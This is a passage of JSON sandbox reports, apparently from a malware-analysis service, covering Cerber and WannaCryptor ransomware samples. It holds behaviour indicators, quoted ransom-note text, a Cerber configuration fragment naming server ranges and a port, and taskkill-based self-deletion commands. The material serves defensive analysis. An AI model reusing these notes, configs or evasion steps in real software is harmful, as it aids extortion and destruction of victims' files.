00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00003064)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-40", "type": 6, "relevance": 10, "name": "Calls an API typically used for keylogging", "description": "\"mshta.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"1\"}\n \"mshta.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"2\"}\n \"mshta.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"16\"}\n \"mshta.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"17\"}\n \"mshta.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"4\"}\n \"mshta.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"18\"}\n \"mshta.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"160\"}\n \"mshta.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"162\"}\n \"mshta.exe\" called \"GetKeyState\" with parameters {\"nVirtKey\": \"164\"}", "origin": "API Call", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-22", "type": 9, "relevance": 5, "name": "Checks network status using ping", "description": "Process \"PING.EXE\" with commandline \"ping -n 1 <IPv4>\" (UID: 00000000-00002080)", "origin": "Monitored Target", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "string-13", "type": 2, "relevance": 5, "name": "Detected indicator that file is ransomware", "description": "\"The only way to decrypt your files is to receive\" (Source: 00000000-00003064.00000001.289912.005C0000.00000004.mdmp, 00000000-00003064.00000001.289912.01420000.00000004.mdmp, 00000000-00003064.00000002.290266.005C0000.00000004.mdmp, 00000000-00003064.00000002.290266.01420000.00000004.mdmp, Indicator: \"decrypt your files\")\n \"with complete instructions how to decrypt your files.\" (Source: 00000000-00003064.00000001.289912.005C0000.00000004.mdmp, 00000000-00003064.00000001.289912.01420000.00000004.mdmp, 00000000-00003064.00000002.290266.005C0000.00000004.mdmp, 00000000-00003064.00000002.290266.01420000.00000004.mdmp, Indicator: \"decrypt your files\")\n \"sPg==\"\n\"file_extension\":\".hta\"}\n{\"file_extension\":\".png\"}]\n\"files_name\":\"_HELP_HELP_HELP_{RAND}_\"\n\"run_by_the_end\":1}\n\"self_deleting\":1\n\"servers\":{\"statistics\":{\"data_finish\":\"e01ENV9LRVl9\"\n\"data_start\":\"e01ENV9LRVl9e1BBUlRORVJfSUR9e09TfXtJU19YNjR9e0lTX0FETUlOfXtDT1VOVF9GSUxFU317U1RPUF9SRUFTT059e1NUQVRVU30=\"\n\"ip\":[\"<IPv4>/27\"\n\"<IPv4>/27\"\n\"<IPv4>/22\"]\n\"port\":6892\n\"send_stat\":1\n\"timeout\":255}}\n\"speaker\":{\"speak\":1\n\"text\":[{\"repeat\":1\n\"text\":\"Attention! Attention! Attention!\"}\n{\"repeat\":5\n\"text\":\"Your documents, photos, databases and other important files have been encrypted!\"}]}\n\"wallpaper\":{\"change_wallpaper\":1\n\"background\":139\n\"color\":16777215\n\"size\":13\n\"text\":\" \\n CERBER RANSOMWARE \\n \\n\\n YOUR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMPORTANT FILES \\n HAVE BEEN ENCRYPTED! \\n\\n The only way to decrypt your files is to receive \\n the private key and decryption\" (Source: 00000000-00003064.00000001.289912.005C0000.00000004.mdmp, Indicator: \"decrypt your files\")\n \"Your documents, photos, databases and other important files have been encrypted!\" (Source: 00000000-00003064.00000001.289912.005C0000.00000004.mdmp, 00000000-00003064.00000002.290266.005C0000.00000004.mdmp, Indicator: \"files have been encrypted\")\n \"our documents, photos, databases and other important files have been encrypted!\" (Source: 00000000-00003064.00000001.289912.01420000.00000004.mdmp, 00000000-00003064.00000002.290266.01420000.00000004.mdmp, Indicator: \"files have been encrypted\")\n \"<p>The instructions \"*_HELP_HELP_HELP_*.hta\" in the folders with your encrypted files are not viruses! The instructions \"*_HELP_HELP_HELP_*.hta\" will help you to decrypt your files.</p>\" (Source: 00000000-00003064.00000001.289912.01420000.00000004.mdmp, 00000000-00003064.00000002.290266.01420000.00000004.mdmp, Indicator: \"decrypt your files\")\n \"<p>It is normal because the files' names and the data in your files have been encrypted by \"Cer&#98;er&nbsp;Rans&#111;mware\".</p>\" (Source: 00000000-00003064.00000001.289912.01420000.00000004.mdmp, 00000000-00003064.00000002.290266.01420000.00000004.mdmp, Indicator: \"files have been encrypted\")\n \"<p>The only way to decrypt your files safely is to &#98;uy the special decryption software \"Cer&#98;er&nbsp;Decryptor\".</p>\" (Source: 00000000-00003064.00000001.289912.01420000.00000004.mdmp, 00000000-00003064.00000002.290266.01420000.00000004.mdmp, Indicator: \"decrypt your files\")\n \"{\"file_extension\":\".png\"}],\"files_name\":\"_HELP_HELP_HELP_{RAND}_\",\"run_by_the_end\":1},\"self_deleting\":1,\"servers\":{\"statistics\":{\"data_finish\":\"e01ENV9LRVl9\",\"data_start\":\"e01ENV9LRVl9e1BBUlRORVJfSUR9e09TfXtJU19YNjR9e0lTX0FETUlOfXtDT1VOVF9GSUxFU317U1RPUF9SRUFTT059e1NUQVRVU30=\",\"ip\":[\"<IPv4>/27\",\"<IPv4>/27\",\"<IPv4>/22\"],\"port\":6892,\"send_stat\":1,\"timeout\":255}},\"speaker\":{\"speak\":1,\"text\":[{\"repeat\":1,\"text\":\"Attention! Attention! Attention!\"},{\"repeat\":5,\"text\":\"Your documents\n photos\n databases and other important files have been encrypted!\"}]},\"wallpaper\":{\"change_wallpaper\":1,\"background\":139,\"color\":16777215,\"size\":13,\"text\":\" \\n CERBER RANSOMWARE \\n \\n\\n YOUR DOCUMENTS\n PHOTOS\n DATABASES AND OTHER IMPORTANT FILES \\n HAVE BEEN ENCRYPTED! \\n\\n The only way to decrypt your files is to receive \\n the private key and decryption\" (Source: 00000000-00003064.00000002.290266.005C0000.00000004.mdmp, Indicator: \"decrypt your files\")", "origin": "File/Memory", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-22", "type": 3, "relevance": 10, "name": "Changes the desktop background picture", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"WALLPAPER\"; Value: \"%TEMP%\\tmpBDC4.bmp\")", "origin": "Registry Access", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-22", "type": 7, "relevance": 10, "name": "Uses a browser-related user-agent without launching browser", "description": "Found user-agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\橢桥捣牰潯楢扥昀煰污浣浤煣浨晵a\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\橢桥捣牰潯楢扥昀煰污浣浤煣浨晵A\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\TorService\\tor\\pluggable_transports\\pt_config.json\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\TorService\\tor\\pluggable_transports\\README.SNOWFLAKE.md\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\Users\\%OSUSER%\\Documents\\Amazon Downloader Logs\\Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\Users\\%OSUSER%\\Documents\\Database1.accdb\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\Users\\%OSUSER%\\Documents\\Outlook Files\\Outlook.pst\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpBDC4.tmp\" with delete access\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"C:\\6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" with delete access\n \"cmd.exe\" opened \"C:\\6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"ShellExecuteW\" with parameter %USERPROFILE%\\desktop\\_HELP_HELP_HELP_QNTKK6_.hta (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"ShellExecuteW\" with parameter %USERPROFILE%\\desktop\\_HELP_HELP_HELP_EFSR87_.png (UID: 00000000-00003064)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (UID: 00000000-00003064)\n Spawned process \"mshta.exe\" with commandline \"\"%USERPROFILE%\\\\Desktop\\\\_HELP_HELP_HELP_QNTKK6_.hta\"\" (UID: 00000000-00003044)\n Spawned process \"cmd.exe\" (UID: 00000000-00003404)\n Spawned process \"taskkill.exe\" with commandline \"taskkill /f /im \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\"\" (UID: 00000000-00002988)\n Spawned process \"PING.EXE\" with commandline \"ping -n 1 <IPv4>\" (UID: 00000000-00002080)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\mshta.exe\" (Handle: 888)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\mshta.exe\" (Handle: 888)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\mshta.exe\" (Handle: 888)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" allocated memory in \"C:\\6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-9", "type": 9, "relevance": 9, "name": "Terminates other processes using tskill/taskkill", "description": "Process \"taskkill.exe\" with commandline \"taskkill /f /im \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\"\" (UID: 00000000-00002988)", "origin": "Monitored Target", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-113", "type": 9, "relevance": 10, "name": "Detected mshta.exe process execution", "description": "Process \"mshta.exe\" with commandline \"\"%USERPROFILE%\\\\Desktop\\\\_HELP_HELP_HELP_QNTKK6_.hta\"\" (UID: 00000000-00003044)", "origin": "Monitored Target", "attck_id": "T1218.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "api-46", "type": 6, "relevance": 5, "name": "Checks for files associated with bitcoin mining software", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\program files\\bitcoin\" (DesiredAccess: 1048832, OpenOptions: 2113568)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\program files\\bitcoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\programdata\\bitcoin\" (DesiredAccess: 1048832, OpenOptions: 2113568)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\programdata\\bitcoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\bitcoin\" (DesiredAccess: 1048832, OpenOptions: 2113568)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\bitcoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\roaming\\bitcoin\" (DesiredAccess: 1048832, OpenOptions: 2113568)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\roaming\\bitcoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\serviceprofiles\\networkservice\\appdata\\roaming\\bitcoin\" (DesiredAccess: 1048832, OpenOptions: 2113568)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\serviceprofiles\\networkservice\\appdata\\roaming\\bitcoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\users\\%OSUSER%\\appdata\\roaming\\bitcoin\" (DesiredAccess: 1048832, OpenOptions: 2113568)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\users\\%OSUSER%\\appdata\\roaming\\bitcoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\bitcoin\" (DesiredAccess: 1048832, OpenOptions: 2113568)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\bitcoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\bitcoin\" (DesiredAccess: 1048832, OpenOptions: 2113568)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\bitcoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\serviceprofiles\\networkservice\\appdata\\local\\bitcoin\" (DesiredAccess: 1048832, OpenOptions: 2113568)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\windows\\serviceprofiles\\networkservice\\appdata\\local\\bitcoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\users\\%OSUSER%\\appdata\\local\\bitcoin\" (DesiredAccess: 1048832, OpenOptions: 2113568)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"c:\\users\\%OSUSER%\\appdata\\local\\bitcoin\\\" (DesiredAccess: 1048577, OpenOptions: 16417)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"C:\\Program Files\\BITCOIN\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"C:\\ProgramData\\BITCOIN\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\BITCOIN\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Roaming\\BITCOIN\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Roaming\\BITCOIN\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\BITCOIN\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\BITCOIN\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\BITCOIN\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\BITCOIN\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened file \"C:\\Users\\%OSUSER%\\AppData\\Local\\BITCOIN\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-17", "type": 7, "relevance": 9, "name": "Contacts many different hosts", "description": "Contacted 60 (or more) hosts in at least 0 different cls.countries", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"blockcypher.com\" has been identified as malicious\n Contacted Domain: \"bitaps.com\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38
https://hybrid-analysis.com/sample/e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38
Hybrid Analysis - Ransomware
{"size": 3514368, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38", "sha256": "e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38", "av_detect": 96, "vx_family": "Trojan.Ransom.WannaCryptor", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "total_processes": 1, "total_signatures": 67, "file_metadata": {"file_compositions": ["1 .RES Files linked with CVTRES.EXE 5.00 (Visual Studio 5) (build: 1735)", "7 .CPP Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 9782)"], "imported_objects": ["13 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 4035)", "4 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 8047)", "11 .C Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8047)", "4 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)", "1 .CPP Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8047)", "2 .OBJ Files linked with ALIASOBJ.EXE 6.00 (Internal OLDNAMES.LIB Tool) (build: 7291)"], "file_analysis": ["File contains C++ code", "File is the product of a small codebase (7 files)"], "total_file_compositions_imports": 163}, "processes": [{"uid": "00000000-00005464", "name": "e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38.exe", "normalized_path": "C:\\e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38.exe", "sha256": "e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": 